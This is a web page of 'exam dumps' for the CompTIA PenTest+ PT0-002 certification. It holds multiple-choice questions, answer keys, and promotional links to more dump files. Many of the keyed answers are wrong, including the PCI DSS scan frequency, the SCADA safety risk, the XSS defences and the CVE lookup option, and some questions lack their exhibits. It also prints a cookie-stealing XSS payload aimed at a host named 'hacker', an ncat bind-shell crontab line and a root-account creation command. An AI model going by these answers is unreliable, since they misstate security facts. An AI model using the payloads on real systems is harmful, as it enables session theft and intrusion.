Use Real PT0-002 Dumps - CompTIA Correct Answers updated on 2021
CompTIA PenTest+ PT0-002 Exam Practice Dumps
NEW QUESTION 19
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
- A. Kismet
- B. Wifite
- C. Wireshark
- D. Aircrack-ng
Answer: D
NEW QUESTION 20
Appending string values onto another string is called:
- A. compilation
- B. connection
- C. concatenation
- D. conjunction
Answer: C
NEW QUESTION 21
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?
- A. Monthly
- B. Weekly
- C. Annually
- D. Quarterly
Answer: B
NEW QUESTION 22
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
- A. To provide feedback on the report structure and recommend improvements
- B. To ensure the penetration-testing team destroys all company data that was gathered during the test
- C. To determine any processes that failed to meet expectations during the assessment
- D. To discuss the findings and dispute any false positives
Answer: C
NEW QUESTION 23
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
- A. devices may cause physical world effects.
- B. devices are obsolete and are no longer available for replacement.
- C. protocols are more difficult to understand.
- D. devices produce more heat and consume more power.
Answer: C
NEW QUESTION 24
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
- A. RCPT TO and VRFY
- B. VRFY and EXPN
- C. EXPN and TURN
- D. VRFY and TURN
Answer: B
NEW QUESTION 25
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
- A. Interview all stakeholders.
- B. Obtain an asset inventory from the client.
- C. Clarify the statement of work.
- D. Identify all third parties involved.
Answer: C
NEW QUESTION 26
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
- A. The licensing of software is ambiguous
- B. The libraries' code bases could be read by anyone
- C. The provenance of code is unknown
- D. The libraries may be unsupported
- E. The libraries may break the application
- F. The libraries may be vulnerable
Answer: B,F
NEW QUESTION 27
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:
Explanation:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions
NEW QUESTION 28
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Session tokens
- B. Output encoding
- C. Web-application firewall
- D. Input validation
- E. Parameterized queries
- F. Base64 encoding
Answer: A,E
NEW QUESTION 29
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?
- A. Dumpster diving
- B. Tailgating
- C. Badge cloning
- D. Shoulder surfing
Answer: A
NEW QUESTION 30
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
- A. Run nmap with the -sA option set against the target
- B. Run nmap with the --script vulners option set against the target
- C. Run nmap with the -sV and -p22 options set against the target
- D. Run nmap with the -o, -p22, and -sC options set against the target
Answer: A
NEW QUESTION 31
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
- A. Download the smb.conf file and look at configurations
- B. Download .pl files and look for usernames and passwords
- C. Edit the smb.conf file and upload it to the server
- D. Edit the discovered file with one line of code for remote callback
Answer: C
NEW QUESTION 32
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
- A. Tailgating
- B. Phishing
- C. Baiting
- D. Shoulder surfing
Answer: C
NEW QUESTION 33
Which of the following is the MOST effective person to validate results from a penetration test?
- A. Client
- B. Third party
- C. Chief Information Officer
- D. Team leader
Answer: D
NEW QUESTION 34
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION 35
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Attempt to flood open ports.
- B. Create an encrypted tunnel.
- C. Look for open ports.
- D. Listen for a reverse shell.
Answer: C
NEW QUESTION 36
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?
- A. Encrypt and store any client information for future analysis
- B. Follow the established data retention and destruction process
- C. Publish the findings after the client reviews the report
- D. Report any findings to regulatory oversight groups
Answer: A
NEW QUESTION 37
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
- A. sudo useradd -ou 0 -g 0 user
- B. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
- C. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
- D. wmic startup get caption,command
Answer: D
NEW QUESTION 38
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?
- A. Encrypted file transfers
- B. User hashes sent over SMB
- C. IP addresses
- D. Multiple handshakes
Answer: B
NEW QUESTION 39
The results of an Nmap scan are as follows:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST
Nmap scan report for ( 10.2.1.22 )
Host is up (0.0102s latency).
Not shown: 998 filtered ports
Port State Service
80/tcp open http
|_http-title: 80F 22% RH 1009.1MB (text/html)
|_http-slowloris-check:
| VULNERABLE:
| Slowloris DoS Attack
| <..>
Device type: bridge|general purpose
Running (JUST GUESSING) : QEMU (95%)
OS CPE: cpe:/a:qemu:qemu
No exact OS matches found for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds
Which of the following device types will MOST likely have a similar response? (Choose two.)
- A. IoT/embedded device
- B. Network device
- C. Public-facing web server
- D. Print queue
- E. Active Directory domain controller
- F. Exposed RDP
Answer: B,C
NEW QUESTION 40
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
- A. The expected time frame of the assessment
- B. The proper emergency contacts for the client
- C. The correct user accounts and associated passwords
- D. A signed statement of work
Answer: A
NEW QUESTION 41
......
Get ready to pass the PT0-002 Exam right now using our CompTIA PenTest+ Exam Package: https://www.trainingquiz.com/PT0-002-practice-quiz.html
PT0-002 Premium Files Test pdf - Free Dumps Collection: https://drive.google.com/open?id=108hnXcxIXjcd6Gt6L9WiNqZxsgRuU_ya

